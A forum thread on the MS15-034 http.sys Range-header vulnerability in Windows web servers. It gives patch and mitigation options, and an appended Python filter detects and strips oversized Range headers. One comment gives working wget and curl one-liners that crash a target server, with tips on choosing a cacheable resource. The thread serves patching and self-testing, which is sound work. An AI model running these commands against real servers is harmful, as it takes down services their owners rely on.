Microsoft Web server critical vulnerability - remote BSoD

NotHackingYou Member Posts: 1,460
In a nutshell, there is a vulnerability in http.sys, the driver underlying IIS and any other service listening for HTTP on Windows (SSRS, IIS, etc). A manipulated Range header can cause the server to BSoD. Microsoft has released a patch.

If you are running a public facing web server on Server 2008R2 and up, you may be vulnerable to this.

Here is a screen grab where I BSoD'd this 2012R2 VM after a few tries of the command:
http://i.imgur.com/waJCVxi.jpg

Options to fix:
1. Patch
2. Disable kernel mode caching
3. Write an iRule to scrub out the Range header.

Reference material:
CVE-2015-1635 - RCE in Windows HTTP.sys : netsec
https://technet.microsoft.com/library/security/ms15-034
When you go the extra mile, there's no traffic.

Comments

  • NotHackingYou Member Posts: 1,460
    To try this yourself you can use wget or curl:

    wget --header="Range: bytes=18-18446744073709551615" http://<yourserver>/<rangeable_resource>

    curl -v http://<yourserver>/<rangeable_resource> -H "Host: <host header>" -H "Range: bytes=18-13466744073709551615"

    A rangeable resource is usually something like an image or audio file. Around 100k seems to work well. Too large and the resource will duck the cache, too small and it won't be cached.
    When you go the extra mile, there's no traffic.
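Added example, not part of the original posts: a Python sketch of the "scrub out the Range header" mitigation from option 3, written as a filter that can also be run over captured requests for detection. The function names and the 1 TiB ceiling are assumptions chosen for illustration; the sample requests are constructed.

```python
import re

# Assumption: nothing served by this host is larger than 1 TiB, so any byte
# position above that is treated as hostile. Tune to your largest real file.
MAX_BYTE_POS = 1 << 40

_RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def range_is_suspicious(value, limit=MAX_BYTE_POS):
    """True if a Range header value is malformed or exceeds the ceiling."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return True  # conservative: only the "bytes" unit is accepted
    for spec in specs.split(","):
        m = _RANGE_SPEC.match(spec)
        if not m or not any(m.groups()):
            return True  # not first-last, first-, or -suffix
        first, last = m.groups()
        if any(p and int(p) > limit for p in (first, last)):
            return True  # e.g. an end position near 2**64 - 1
        if first and last and int(first) > int(last):
            return True
    return False


def scrub_request(raw, limit=MAX_BYTE_POS):
    """Drop suspicious Range headers; return (cleaned_request, flagged)."""
    head, sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    kept, flagged = [lines[0]], []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "range" and range_is_suspicious(value.strip(), limit):
            flagged.append(value.strip())  # keep for logging / alerting
            continue
        kept.append(line)
    return "\r\n".join(kept) + sep + body, flagged


# Constructed sample requests (host and path are placeholders).
BENIGN = ("GET /logo.png HTTP/1.1\r\nHost: www.example.test\r\n"
          "Range: bytes=0-1023\r\n\r\n")
OVERSIZE = ("GET /logo.png HTTP/1.1\r\nHost: www.example.test\r\n"
            "Range: bytes=18-18446744073709551615\r\n\r\n")
```

Dropping the header makes the server answer with the full resource instead of a partial one, which is why legitimate ranges are passed through untouched.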